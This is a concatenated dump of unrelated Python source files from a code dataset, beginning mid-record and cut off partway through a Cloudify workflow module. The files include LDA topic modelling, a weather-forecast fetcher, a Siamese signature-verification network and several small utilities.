str(file_out), info_dict=True) == (\n specific, expected_parameters_result)\n assert file_out.read_binary() == out_content\n\n # Checks without info_dict\n assert accelerator.process(str(file_in), str(file_out)) == specific\n\n # Checks without result\n del parameters_result['app']['specific']\n assert accelerator.process(str(file_in), str(file_out)) == dict()\n\n # Restore requests and OpenApi API\n finally:\n requests.Session = requests_session\n rest_api.ProcessApi = openapi_client_process_api\n","sub_path":"tests/test_client_rest.py","file_name":"test_client_rest.py","file_ext":"py","file_size_in_byte":21888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"89255423","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.decomposition import LatentDirichletAllocation\nfrom spacy.lang.en.lemmatizer.lookup import LOOKUP\nfrom sklearn.externals import joblib\nimport pandas as pd\nimport numpy as np\nimport sys\nimport re\n\nif len(sys.argv) < 2:\n print(\"Usage:\",sys.argv[0],\"\")\n sys.exit(1)\nelif len(sys.argv) == 2:\n n_components = [int(sys.argv[1])]\nelse:\n n_components = list([int(sys.argv[i]) for i in range(1,len(sys.argv))])\n\nfname = \"../data/tesi_US/US_PhD_dissertations.xlsx\"\nn_features = [6000]\n\ndef get_top_n_words(corpus, n=None):\n vec = CountVectorizer().fit(corpus)\n bag_of_words = vec.transform(corpus)\n sum_words = bag_of_words.sum(axis=0)\n words_freq = [(word, sum_words[0, idx]) for word, idx in vec.vocabulary_.items()]\n words_freq = sorted(words_freq, key = lambda x: x[1], reverse=True)\n return words_freq[:n]\n\ndef feed_data(input_data):\n for index,row in input_data.iterrows():\n yield row[' Abstract ']\n\nprint(\"Reading data...\")\nabstracts = pd.read_excel(fname, usecols=[24])\n\nprint(\"Preprocessing data...\")\nabstracts = abstracts[abstracts[' Abstract '] != \" Nessun elemento disponibile. \"]\nabstracts = abstracts[abstracts[' Abstract '] != \" Abstract Not Available. \"]\nabstracts = abstracts[abstracts[' Abstract '] != \" Abstract not available. \"]\nabstracts = abstracts[abstracts[' Abstract '] != \" Abstract Not Available \"]\nabstracts = abstracts[abstracts[' Abstract '] != \"Abstract not available.\"]\n\ncv = CountVectorizer(stop_words=\"english\", analyzer=\"word\", max_df=0.7)\nanalyzer = cv.build_analyzer()\n\n#stopwrods/punctuation removal + lowercase + tokenization\nabstracts = abstracts.applymap(lambda x: \" \".join(s for s in analyzer(x)))\n#stemming\nabstracts = abstracts.applymap(lambda x: \" \".join(LOOKUP[s] for s in x.split() if s in LOOKUP))\n\nfor n_words in n_features:\n print(\"Selecting most frequent\",n_words ,\"words...\")\n top_freqs = get_top_n_words(abstracts[' Abstract '], n_words)\n words = list([word for word,freq in top_freqs])\n\n print(\" Computing term-document matrix...\")\n TDmatrix = cv.fit(words)\n TDmatrix = cv.transform(feed_data(abstracts))\n\n for num in n_components:\n print(\" starting LDA with\",num,\"topics...\")\n lda = LatentDirichletAllocation(n_components=num,\n max_iter=15,\n learning_method='online',\n learning_offset=30.,\n random_state=0,\n n_jobs=-1)\n\n lda.fit(TDmatrix)\n joblib.dump(lda, \"LDA_s_\"+str(num)+\"_\"+str(n_words)[:-3]+\"k.pkl\")\n","sub_path":"analysis/train_LDA_stemming.py","file_name":"train_LDA_stemming.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"169686532","text":"from strategy_1 import Strategy_1\nfrom data import Data\nfrom candle import Candle\nfrom type import TimeRange\nimport datetime\n\n\nclass StrategyInit:\n \"\"\"Класс инициализации стратегии\n\n В классе инициализируется стратегия, собираются данные под требования стратегии,\n создается объект стратегии, стратегия запускается в работу\n \"\"\"\n\n def __init__(self, strategy: Strategy_1):\n \"\"\"Конструктор класса инициализации стратегии\n\n Args:\n strategy: Стратегия\n \"\"\"\n\n self.strategy = strategy\n\n def getNeed(self):\n \"\"\"Сбор данных под требования стратеги\n\n \"\"\"\n\n self.strategyNeed = self.strategy.setNeed()\n if (self.strategyNeed.candleCount != None):\n pass # Выбор диапозона, создание и заполнение свечей\n\n if (self.strategyNeed.dataTimeRange != None):\n print(\"STRATEGY NEEDS DATA FOR \" + str(self.strategyNeed.dataTimeRange) + \"MINUTES\")\n self.timeRange = TimeRange()\n print(\"Set begin time: \\n\")\n self.timeRange.beginTime = datetime.datetime(int(input(\"year: \")), int(input(\"month: \")),\n int(input(\"day: \")),\n int(input(\"hour: \")), int(input(\"minute: \"), 0))\n print(\"Set end time: \\n\")\n self.timeRange.endTime = datetime.datetime(int(input(\"year: \")), int(input(\"month: \")),\n int(input(\"day: \")),\n int(input(\"hour: \")), int(input(\"minute: \"), 0))\n self.data = Data(self.timeRange)\n self.strategy.setPastData(self.data)\n\n def start(self):\n \"\"\"Запуск работы стратегии\n\n \"\"\"\n\n self.strategy.getDecision()\n\n # Далее либо бесконечный цикл, либо что-то еще\n\n\nif __name__ == \"__main__\":\n strat = Strategy_1()\n A = StrategyInit(strat)\n A.getNeed()\n A.start()\n","sub_path":"src/strategyInit.py","file_name":"strategyInit.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427359192","text":"#!/usr/bin/env python3\n\n\"\"\"\n#!//bin/ksh\n\n# Shell Implementation\n\nDate=$(/bin/date +%d-%b-%Y)\n\nif [[ $1 != \"\" ]]; then\n cp -p $1 ${1}.${Date}.$$\nfi\n\"\"\"\n\n\nclass BDate:\n\n @staticmethod\n def date_pattern():\n \"\"\"\n Return a date pattern\n :return: Day_MonthName_Year_HourMinSecMicrosecond\n \"\"\"\n\n from datetime import datetime\n\n # Current time\n now = datetime.now()\n # Getting date\n date_val = now.strftime('%d_%b_%Y')\n # Getting hour:min:sec\n hour_val = now.strftime('%H%M%S')\n # Getting microsecond\n micro_val = now.strftime('%f')[:2]\n\n # Returns a str in described format\n return f'{date_val}_{hour_val}{micro_val}'\n\n @staticmethod\n def copy_file(file_name, new_file_name):\n \"\"\"\n Copy one file to another\n :param file_name: file to be copied\n :param new_file_name: saved name copied file\n :return: None\n \"\"\"\n\n import os\n\n if not os.path.exists(file_name):\n raise FileNotFoundError\n\n with open(str(file_name), 'rb') as infile:\n with open(str(new_file_name), 'wb') as outfile:\n while True:\n buff = infile.read(10240)\n if buff:\n outfile.write(buff)\n else:\n break\n\n return\n\n\ndef create_backup_file(*args):\n \"\"\"\n Takes the list of filenames and rename with date pattern in the end\n :param args: argument of file names\n :return: renames the file name[s] passed with added date_pattern\n \"\"\"\n\n for file in list(*args):\n try:\n date_pattern = BDate.date_pattern()\n BDate.copy_file(file, f'{file}.{date_pattern}')\n except FileNotFoundError as err:\n print(f'[ERROR] {err.filename} : No such file or directory')\n\n\nif __name__ == '__main__':\n \"\"\"\n Takes the name/names of the file to rename with date_pattern\n :param None\n :return None\n \"\"\"\n\n import sys\n\n if len(sys.argv) == 1:\n print(\"\"\"Usage: bdate file_name\"\"\")\n exit(-1)\n\n # Removing script name from the list\n del sys.argv[0]\n\n # Calling the Main Command for creating filename with pattern\n create_backup_file(sys.argv)\n","sub_path":"bdate.py","file_name":"bdate.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208845579","text":"import json\nimport requests\nimport csv\ndef meteo(city):\n api_key = \"b8bdb7d52b20aa7c239f409d7f009840\"\n # requete post\n url = \"https://api.openweathermap.org/data/2.5/forecast?lang=fr&q=%s&appid=%s\" % (city, api_key)\n x = requests.get(url)\n try:\n x = json.loads(x.text)\n x = x['list']\n i = 0\n tab=\"\"\n while(i<40):\n y = x[i]\n main = y['main']\n date = y['dt_txt']\n temp = main['temp'] - 273.15\n temp = round(temp)\n temp_min = main['temp_min'] - 273.15\n temp_min = round(temp_min)\n temp_max = main['temp_max'] - 273.15\n temp_max = round(temp_max)\n tab= tab+\"Ville: %s \\ntemperature : %s c\\ntemperature min : %s c\\ntemperature max : %s c\\ndate : %s \\n\" % (\n city, temp, temp_min, temp_max,date)\n i = i + 1\n fichier = open(\"data.txt\", \"w+\")\n fichier.write(tab)\n fichier.close()\n except:\n yolo = input('entre une nouvelle ville avec le bon nom cette fois ...')\n meteo(yolo)\nyolo= input(\"Entrez la ville \")\nmeteo(yolo)","sub_path":"Python/exo1.py","file_name":"exo1.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45500520","text":"import boto3\r\nfrom datetime import datetime, timedelta\r\nimport re\r\n\r\nclient = boto3.client('sagemaker')\r\nrunning_jobs = client.list_training_jobs(CreationTimeAfter=datetime.utcnow() - timedelta(hours=1))\r\n\r\nlogdir = None\r\nfor job in running_jobs['TrainingJobSummaries']:\r\n tensorboard_job = False\r\n name = None\r\n tags = client.list_tags(ResourceArn=job['TrainingJobArn'])\r\n for tag in tags['Tags']:\r\n if tag['Key'] == 'TensorBoard':\r\n name = tag['Value']\r\n if tag['Key'] == 'Project' and tag['Value'] == 'cifar10':\r\n desc = client.describe_training_job(TrainingJobName=job['TrainingJobName'])\r\n job_name = desc['HyperParameters']['sagemaker_job_name'].replace('\"', '')\r\n tensorboard_dir = re.sub(\r\n 'source/sourcedir.tar.gz', 'model', desc['HyperParameters']['sagemaker_submit_directory']\r\n )\r\n tensorboard_job = True\r\n\r\n if tensorboard_job:\r\n if name is None:\r\n name = job['TrainingJobName']\r\n\r\n if logdir is None:\r\n logdir = '{}:{}'.format(name, tensorboard_dir)\r\n else:\r\n logdir = '{},{}:{}'.format(logdir, name, tensorboard_dir)\r\n\r\nif logdir:\r\n print('AWS_REGION={} tensorboard --logdir {}'.format(boto3.session.Session().region_name, logdir))\r\nelse:\r\n print('No jobs are in progress')","sub_path":"Generación del tensor board.py","file_name":"Generación del tensor board.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189473361","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 16 14:39:55 2021\r\n\r\n@author: Aditya\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\n##from numpy import asarray\r\nimport os \r\nimport glob\r\n##import secrets\r\nfrom tensorflow.keras.models import Model\r\nfrom tensorflow.keras.layers import Input\r\nfrom tensorflow.keras.layers import Conv2D\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import Dropout\r\nfrom tensorflow.keras.layers import MaxPooling2D\r\nfrom tensorflow.keras.layers import Lambda\r\nfrom tensorflow.keras.layers import Flatten\r\n# from keras.layers import Dense, Conv2D, Input, MaxPool2D, Flatten, merge\r\nimport tensorflow.keras.backend as K\r\nimport cv2\r\nfrom keras.regularizers import l2\r\nfrom keras.optimizers import Adam, RMSprop\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate, Dropout\r\nfrom keras.models import Model\r\n\r\nfrom keras.layers.normalization import BatchNormalization\r\n\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\r\n\r\n\r\nbase = '/content/drive/MyDrive/main'\r\n\r\nclasses = os.listdir(base)\r\n\r\n##images = glob.glob(base, '*.png')\r\n\r\nimages = glob.glob('/content/drive/MyDrive/main/**/*.png', \r\n recursive = True) \r\n\r\nprint('images')\r\nprint(len(images))\r\n\r\n##real = os.listdir(base_real)\r\n##forged = os.listdir(base_forged)\r\n\r\nreal_images = []\r\nforged_images = []\r\nimg_h, img_w = 150, 200\r\nlabels = []\r\nimg_shape = 28\r\nreal_list = np.empty(shape=(2,5), dtype= object) \r\nforged_list = np.empty(shape=(2,5), dtype=object)\r\n# pairs = []\r\nimg_shape = (28, 28,1)\r\n \r\n##targets = []\r\n \r\n\r\n\r\ndef build_siamese_model(input_shape):\r\n \r\n model = Sequential()\r\n \r\n model.add(Conv2D(96, kernel_size=(11, 11), activation='relu', name='conv1_1', strides=4, input_shape= input_shape, \r\n kernel_initializer='glorot_uniform'))\r\n model.add(BatchNormalization(epsilon=1e-06, axis=1, momentum=0.9))\r\n model.add(MaxPooling2D((3,3), strides=(2, 2))) \r\n model.add(ZeroPadding2D((2, 2)))\r\n \r\n model.add(Conv2D(256, kernel_size=(5, 5), activation='relu', name='conv2_1', strides=1, kernel_initializer='glorot_uniform'))\r\n model.add(BatchNormalization(epsilon=1e-06, axis=1, momentum=0.9))\r\n model.add(MaxPooling2D((3,3), strides=(2, 2)))\r\n model.add(Dropout(0.3))# added extra\r\n model.add(ZeroPadding2D((1, 1)))\r\n \r\n model.add(Conv2D(384, kernel_size=(3, 3), activation='relu', name='conv3_1', strides=1, kernel_initializer='glorot_uniform'))\r\n model.add(ZeroPadding2D((1, 1)))\r\n \r\n model.add(Conv2D(256, kernel_size=(3, 3), activation='relu', name='conv3_2', strides=1, kernel_initializer='glorot_uniform')) \r\n model.add(MaxPooling2D((3,3), strides=(2, 2)))\r\n model.add(Dropout(0.3))# added extra\r\n model.add(Flatten(name='flatten'))\r\n model.add(Dense(1024, kernel_regularizer=l2(0.0005), activation='relu', kernel_initializer='glorot_uniform'))\r\n model.add(Dropout(0.5))\r\n \r\n model.add(Dense(128, kernel_regularizer=l2(0.0005), activation='relu', kernel_initializer='glorot_uniform')) # softmax changed to relu\r\n \r\n return model\r\n\r\ndef euclidean_distance(vectors):\r\n\t# unpack the vectors into separate lists\r\n\tfeatsA, featsB = vectors\r\n\t# compute the sum of squared distances between the vectors\r\n\treturn K.sqrt(K.sum(K.square(featsA - featsB), axis=1, keepdims=True))\r\n\r\n\r\ndef euclidean_distance_output_shape(shapes):\r\n shape1, shape2 = shapes\r\n return (shape1[0], 1)\r\n\r\ndef contrastive_loss(y_true, y_pred):\r\n\r\n margin = 1\r\n\r\n loss = K.mean(y_true * K.square(y_pred) + (1 - y_true) * K.square(K.maximum(margin - y_pred, 0)))\r\n\r\n return loss\r\n\r\n\r\n\r\n\r\n\r\ndef image_read(path):\r\n image = cv2.imread(path, 0)\r\n image = cv2.resize(image, (img_w, img_h))\r\n image = np.array(image, dtype= np.float64)\r\n image /= 255\r\n image = image.reshape(img_h, img_w, 1)\r\n\r\n return image\r\n\r\n\r\ntraining_dir = '/content/drive/MyDrive/sign_data/train'\r\ntraining_csv = '/content/drive/MyDrive/sign_data/train_data.csv'\r\ntest_csv = '/content/drive/MyDrive/sign_data/test_data.csv'\r\ntest_dir = '/content/drive/MyDrive/sign_data/test'\r\n\r\ndef siamese_datagen(training_dir, training_csv, batch_size = 16):\r\n while True:\r\n targets = np.zeros((batch_size,))\r\n training_df = pd.read_csv(training_csv)\r\n pairs = [np.zeros((batch_size, img_h, img_w, 1)) for i in range(2)]\r\n p = 0\r\n for i in range(0, len(training_df)):\r\n image1_path = os.path.join(training_dir, training_df.iat[i, 0])\r\n image2_path = os.path.join(training_dir, training_df.iat[i, 1])\r\n\r\n img1 = image_read(image1_path)\r\n img2 = image_read(image2_path)\r\n\r\n pairs[0][p,:,:,:] = img1\r\n pairs[1][p,:,:,:] = img2\r\n\r\n targets[p] = training_df.iat[i, 2]\r\n\r\n p += 1\r\n\r\n if p == batch_size:\r\n yield pairs, targets\r\n p = 0\r\n pairs = [np.zeros((batch_size, img_h, img_w, 1)) for i in range(2)]\r\n targets = np.zeros((batch_size,))\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n# training_data = siamese_datagen(real_images, forged_images, batch_size= 2) \r\n\r\nimage_shape = (img_h, img_w, 1)\r\n\r\nfeatureExtractor = build_siamese_model(image_shape)\r\nimgA = Input(shape = (image_shape))\r\nimgB = Input(shape = (image_shape))\r\nfeatsA = featureExtractor(imgA)\r\nfeatsB = featureExtractor(imgB)\r\n\r\ndistance = Lambda(euclidean_distance, output_shape = euclidean_distance_output_shape)([featsA, featsB])\r\n\r\nmodel = Model(inputs=[imgA, imgB], outputs=distance) \r\n\r\nbatch_sz = 128\r\ntraining_samples = 23206\r\nvalidation_samples = 5748\r\n\r\nrms = RMSprop(lr=0.01, rho=0.9, epsilon=1e-08)\r\nmodel.compile(loss=contrastive_loss, optimizer=rms)\r\n\r\n\r\ncallbacks = [\r\n ReduceLROnPlateau(factor=0.1, patience=5, min_lr=0.000001, verbose=1),\r\n ModelCheckpoint('/content/siamese_network.h5', verbose=1, save_weights_only=True)\r\n]\r\n\r\n\r\n\r\n# train the model\r\nprint(\"[INFO] training model...\")\r\nhistory = model.fit_generator(siamese_datagen(training_dir, training_csv, batch_sz),\r\n \t validation_data= siamese_datagen(test_dir, test_csv, batch_sz),\r\n epochs=50,\r\n steps_per_epoch = training_samples//batch_sz,\r\n validation_steps = validation_samples // batch_sz,\r\n callbacks = callbacks)\r\n\r\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436723011","text":"\"\"\"\nThis module contains user interface related code, such as the\nmain screen and diagram windows.\n\"\"\"\n\nfrom gi.repository import Gtk, Gdk\nimport pkg_resources\nimport os.path\n\nicon_theme = Gtk.IconTheme.get_default()\nicon_theme.append_search_path(\n os.path.abspath(pkg_resources.resource_filename(\"gaphor.ui\", \"pixmaps\"))\n)\n\nimport re\n\n\ndef _repl(m):\n v = m.group(1).lower()\n return len(v) == 1 and v or \"%c-%c\" % tuple(v)\n\n\n_repl.expr = \"(.?[A-Z])\"\n\n\ndef icon_for_element(element):\n return re.sub(_repl.expr, _repl, type(element).__name__)\n\n\n# Set style for model canvas\ncss_provider = Gtk.CssProvider.new()\nscreen = Gdk.Display.get_default().get_default_screen()\n\nGtk.StyleContext.add_provider_for_screen(\n screen, css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION\n)\ncss_provider.load_from_data(\"#diagram-tab { background: white }\".encode(\"utf-8\"))\n","sub_path":"gaphor/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412188648","text":"__author__ = 'haibin'\n\nfrom setuptools import setup\n\nsetup(\n name='pycayley',\n version='0.4.2',\n author='zhao haibin',\n author_email='zhaohaibin@outlook.com',\n packages=['pycayley'],\n url='https://github.com/haibinpark/pycayley',\n license='LICENSE',\n description='Python client for an open-source graph database Cayley',\n install_requires=['requests', 'rdflib', 'pyld'],\n include_package_data=True\n)\n","sub_path":"pypi_install_script/pycayley-0.4.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"229225069","text":"import subprocess, time\n\n\ndef runNebula(threadName, lineCallback, executable, config):\n\n shell = True\n\n count = 0\n popen = subprocess.Popen([executable, \"--config\", config], shell=shell, stdout=subprocess.PIPE)\n for line in iter(popen.stdout.readline, ''):\n lineCallback(line)\n popen.wait()","sub_path":"nebula.py","file_name":"nebula.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481267032","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\nfrom __future__ import absolute_import\n\nimport functools\nimport copy\nimport uuid\nimport threading\nimport logging\n\nfrom proxy_tools import proxy\n\nfrom cloudify import amqp_client, context\nfrom cloudify._compat import queue\nfrom cloudify.manager import (get_bootstrap_context,\n get_rest_client,\n download_resource)\nfrom cloudify.workflows.tasks import (TASK_FAILED,\n TASK_SUCCEEDED,\n TASK_RESCHEDULED,\n RemoteWorkflowTask,\n LocalWorkflowTask,\n NOPLocalWorkflowTask,\n DryRunLocalWorkflowTask,\n DEFAULT_TOTAL_RETRIES,\n DEFAULT_RETRY_INTERVAL,\n DEFAULT_SEND_TASK_EVENTS,\n DEFAULT_SUBGRAPH_TOTAL_RETRIES,\n _SetNodeInstanceStateTask,\n _GetNodeInstanceStateTask,\n _SendNodeEventTask,\n _SendWorkflowEventTask,\n _UpdateExecutionStatusTask)\nfrom cloudify.constants import MGMTWORKER_QUEUE\nfrom cloudify import utils, logs, exceptions\nfrom cloudify.state import current_workflow_ctx\nfrom cloudify.workflows import events\nfrom cloudify.error_handling import deserialize_known_exception\nfrom cloudify.workflows.tasks_graph import TaskDependencyGraph\nfrom cloudify.amqp_client_utils import AMQPWrappedThread\nfrom cloudify.logs import (CloudifyWorkflowLoggingHandler,\n CloudifyWorkflowNodeLoggingHandler,\n SystemWideWorkflowLoggingHandler,\n init_cloudify_logger,\n send_workflow_event,\n send_sys_wide_wf_event)\nfrom cloudify.models_states import DeploymentModificationState\n\nfrom cloudify.utils import is_agent_alive\n\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n from ordereddict import OrderedDict\n\n\nDEFAULT_LOCAL_TASK_THREAD_POOL_SIZE = 8\n\n\nclass CloudifyWorkflowRelationshipInstance(object):\n \"\"\"\n A node instance relationship instance\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node_instance: a CloudifyWorkflowNodeInstance instance\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n :param relationship_instance: A relationship dict from a NodeInstance\n instance (of the rest client model)\n \"\"\"\n\n def __init__(self, ctx, node_instance, nodes_and_instances,\n relationship_instance):\n self.ctx = ctx\n self.node_instance = node_instance\n self._nodes_and_instances = nodes_and_instances\n self._relationship_instance = relationship_instance\n self._relationship = node_instance.node.get_relationship(\n relationship_instance['target_name'])\n\n @property\n def target_id(self):\n \"\"\"The relationship target node id\"\"\"\n return self._relationship_instance.get('target_id')\n\n @property\n def target_node_instance(self):\n \"\"\"\n The relationship's target node CloudifyWorkflowNodeInstance instance\n \"\"\"\n return self._nodes_and_instances.get_node_instance(self.target_id)\n\n @property\n def relationship(self):\n \"\"\"The relationship object for this relationship instance\"\"\"\n return self._relationship\n\n def execute_source_operation(self,\n operation,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n \"\"\"\n Execute a node relationship source operation\n\n :param operation: The node relationship operation\n :param kwargs: optional kwargs to be passed to the called operation\n \"\"\"\n return self.ctx._execute_operation(\n operation,\n node_instance=self.node_instance,\n related_node_instance=self.target_node_instance,\n operations=self.relationship.source_operations,\n kwargs=kwargs,\n allow_kwargs_override=allow_kwargs_override,\n send_task_events=send_task_events)\n\n def execute_target_operation(self,\n operation,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n \"\"\"\n Execute a node relationship target operation\n\n :param operation: The node relationship operation\n :param kwargs: optional kwargs to be passed to the called operation\n \"\"\"\n return self.ctx._execute_operation(\n operation,\n node_instance=self.target_node_instance,\n related_node_instance=self.node_instance,\n operations=self.relationship.target_operations,\n kwargs=kwargs,\n allow_kwargs_override=allow_kwargs_override,\n send_task_events=send_task_events)\n\n\nclass CloudifyWorkflowRelationship(object):\n \"\"\"\n A node relationship\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node: a CloudifyWorkflowNode instance\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n :param relationship: a relationship dict from a Node instance (of the\n rest client mode)\n \"\"\"\n\n def __init__(self, ctx, node, nodes_and_instances, relationship):\n self.ctx = ctx\n self.node = node\n self._nodes_and_instances = nodes_and_instances\n self._relationship = relationship\n\n @property\n def target_id(self):\n \"\"\"The relationship target node id\"\"\"\n return self._relationship.get('target_id')\n\n @property\n def target_node(self):\n \"\"\"The relationship target node WorkflowContextNode instance\"\"\"\n return self._nodes_and_instances.get_node(self.target_id)\n\n @property\n def source_operations(self):\n \"\"\"The relationship source operations\"\"\"\n return self._relationship.get('source_operations', {})\n\n @property\n def target_operations(self):\n \"\"\"The relationship target operations\"\"\"\n return self._relationship.get('target_operations', {})\n\n @property\n def properties(self):\n return self._relationship.get('properties', {})\n\n def is_derived_from(self, other_relationship):\n \"\"\"\n :param other_relationship: a string like\n cloudify.relationships.contained_in\n \"\"\"\n return other_relationship in self._relationship[\"type_hierarchy\"]\n\n\nclass CloudifyWorkflowNodeInstance(object):\n \"\"\"\n A plan node instance\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node: a CloudifyWorkflowContextNode instance\n :param node_instance: a NodeInstance (rest client response model)\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n \"\"\"\n\n def __init__(self, ctx, node, node_instance, nodes_and_instances):\n self.ctx = ctx\n self._node = node\n self._node_instance = node_instance\n # Directly contained node instances. Filled in the context's __init__()\n self._contained_instances = []\n self._relationship_instances = OrderedDict(\n (relationship_instance['target_id'],\n CloudifyWorkflowRelationshipInstance(\n self.ctx, self, nodes_and_instances,\n relationship_instance))\n for relationship_instance in node_instance.relationships)\n\n # adding the node instance to the node instances map\n node._node_instances[self.id] = self\n\n self._logger = None\n\n def set_state(self, state):\n \"\"\"\n Set the node state\n\n :param state: The node state\n :return: the state set\n \"\"\"\n # We don't want to alter the state of the instance during a dry run\n if self.ctx.dry_run:\n return NOPLocalWorkflowTask(self.ctx)\n\n set_state_task = _SetNodeInstanceStateTask(self.id, state)\n\n return self.ctx.local_task(\n local_task=set_state_task,\n node=self,\n info=state)\n\n def get_state(self):\n \"\"\"\n Get the node state\n\n :return: The node state\n \"\"\"\n get_state_task = _GetNodeInstanceStateTask(self.id)\n return self.ctx.local_task(\n local_task=get_state_task,\n node=self)\n\n def send_event(self, event, additional_context=None):\n \"\"\"\n Sends a workflow node event to RabbitMQ\n\n :param event: The event\n :param additional_context: additional context to be added to the\n context\n \"\"\"\n send_event_task = _SendNodeEventTask(\n self.id, event, additional_context)\n return self.ctx.local_task(\n local_task=send_event_task,\n node=self,\n info=event)\n\n def execute_operation(self,\n operation,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n \"\"\"\n Execute a node operation\n\n :param operation: The node operation\n :param kwargs: optional kwargs to be passed to the called operation\n \"\"\"\n return self.ctx._execute_operation(\n operation=operation,\n node_instance=self,\n operations=self.node.operations,\n kwargs=kwargs,\n allow_kwargs_override=allow_kwargs_override,\n send_task_events=send_task_events)\n\n @property\n def id(self):\n \"\"\"The node instance id\"\"\"\n return self._node_instance.id\n\n @property\n def state(self):\n \"\"\"The node instance state\"\"\"\n return self._node_instance.state\n\n @property\n def node_id(self):\n \"\"\"The node id (this instance is an instance of that node)\"\"\"\n return self._node_instance.node_id\n\n @property\n def relationships(self):\n \"\"\"The node relationships\"\"\"\n return iter(self._relationship_instances.values())\n\n @property\n def node(self):\n \"\"\"The node object for this node instance\"\"\"\n return self._node\n\n @property\n def modification(self):\n \"\"\"Modification enum (None, added, removed)\"\"\"\n return self._node_instance.get('modification')\n\n @property\n def scaling_groups(self):\n return self._node_instance.get('scaling_groups', [])\n\n @property\n def logger(self):\n \"\"\"A logger for this workflow node\"\"\"\n if self._logger is None:\n self._logger = self._init_cloudify_logger()\n return self._logger\n\n def _init_cloudify_logger(self):\n logger_name = '{0}-{1}'.format(self.ctx.execution_id, self.id)\n logging_handler = self.ctx.internal.handler.get_node_logging_handler(\n self)\n return init_cloudify_logger(logging_handler, logger_name)\n\n @property\n def contained_instances(self):\n \"\"\"\n Returns node instances directly contained in this instance (children)\n \"\"\"\n return self._contained_instances\n\n def _add_contained_node_instance(self, node_instance):\n self._contained_instances.append(node_instance)\n\n def get_contained_subgraph(self):\n \"\"\"\n Returns a set containing this instance and all nodes that are\n contained directly and transitively within it\n \"\"\"\n result = set([self])\n for child in self.contained_instances:\n result.update(child.get_contained_subgraph())\n return result\n\n\nclass CloudifyWorkflowNode(object):\n \"\"\"\n A plan node instance\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node: a Node instance (rest client response model)\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n \"\"\"\n\n def __init__(self, ctx, node, nodes_and_instances):\n self.ctx = ctx\n self._node = node\n self._relationships = OrderedDict(\n (relationship['target_id'], CloudifyWorkflowRelationship(\n self.ctx, self, nodes_and_instances, relationship))\n for relationship in node.relationships)\n self._node_instances = {}\n\n @property\n def id(self):\n \"\"\"The node id\"\"\"\n return self._node.id\n\n @property\n def type(self):\n \"\"\"The node type\"\"\"\n return self._node.type\n\n @property\n def type_hierarchy(self):\n \"\"\"The node type hierarchy\"\"\"\n return self._node.type_hierarchy\n\n @property\n def properties(self):\n \"\"\"The node properties\"\"\"\n return self._node.properties\n\n @property\n def plugins_to_install(self):\n \"\"\"\n The plugins to install in this node. (Only relevant for host nodes)\n \"\"\"\n return self._node.get('plugins_to_install', [])\n\n @property\n def plugins(self):\n \"\"\"\n The plugins associated with this node\n \"\"\"\n return self._node.get('plugins', [])\n\n @property\n def host_id(self):\n return self._node.host_id\n\n @property\n def host_node(self):\n return self.ctx.get_node(self.host_id)\n\n @property\n def number_of_instances(self):\n return self._node.number_of_instances\n\n @property\n def relationships(self):\n \"\"\"The node relationships\"\"\"\n return iter(self._relationships.values())\n\n @property\n def operations(self):\n \"\"\"The node operations\"\"\"\n return self._node.operations\n\n @property\n def instances(self):\n \"\"\"The node instances\"\"\"\n return iter(self._node_instances.values())\n\n def 